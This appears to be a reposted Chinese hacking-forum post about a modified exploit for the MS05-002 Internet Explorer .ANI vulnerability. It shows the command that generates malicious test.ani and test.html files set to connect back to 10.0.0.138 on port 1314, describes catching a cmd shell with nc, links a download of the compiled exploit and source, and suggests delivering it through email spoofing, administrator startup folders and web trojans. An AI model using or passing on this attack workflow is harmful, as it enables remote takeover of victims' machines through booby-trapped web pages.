现在的位置: 首页 > 综合 > 正文

转帖 ms05002漏洞利用程序及其测试结果

2013年10月02日 ⁄ 综合 ⁄ 共 1171字 ⁄ 字号 评论关闭
文章作者:无敌最寂寞[E.S.T]
信息来源:邪恶八进制 中国

漏洞详细资料可以去下面的这个地址下载:
http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx

拿到代码后,仔细阅读了一下代码.原代码是采用了本地邦定的shellcode.实战性太差,又由于本漏洞和以前的那个IEFRAME TAG溢出漏洞有一些相似点.比如由于溢出后产生的shell继承了IE的权限,而此权限取决于运行IE的用户,因此利用此漏洞提升权限的可能性就很小了.不过,也不是不可能,比如邮件欺骗,或者放到管理员账户自启动的文件夹里等等.因此我修改了部分源代码,去掉了本定邦定的shellcode,换上了反向链接的shellcode.

程序运行界面如下:

 

很简单的利用方法.首先我们先用这个程序来生成溢出文件:

H:/temp/c/lcc>ms05002 test 10.0.0.138 1314

(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit

Copyright (c) 2004-2005 .: houseofdabus :.

rewritten by 无敌最寂寞@EST

Tested on all affected systems:
[+] Windows Server 2003
[+] Windows XP SP1, SP0
[+] Windows 2000 All SP

This is provided as proof-of-concept code only for educational purposes and test
ing by authorized individuals with permission to do so.

Creating test.ani file ... Ok

Creating test.html file ... Ok

生成后,用nc监听本定端口1314,然后用IE打开溢出文件test.html(打开方法有多钟,实战中看个人发挥,我这里为了直观,是先打开IE然后从菜单中打开test.html的,打开后IE僵死,弹出一新的cmd窗口,接着nc得到一个cmd shell,测试图如下:

到此此漏洞测试完毕.我附上修改后以编译好的文件和源代码.谢谢大家的支持!

http://neeao.com/lbs/attachments/month_200501/23_204557_c02gms05002.rar

补充一点的是,这个跟以前的那个IEFRAME TAG溢出漏洞利用上的很大的不同之处就是,IEFRAME tag 采用的触发方法是暴力扩大内存的方法,因此会造成内存的非常大的消耗...很容易造成机器假死或者当机.但是此漏洞不同,他只是会造成IE的死掉,但并不会占用大量内存 .所以巧妙的运用到网页木马上有的时候也会有奇效!

抱歉!评论已关闭.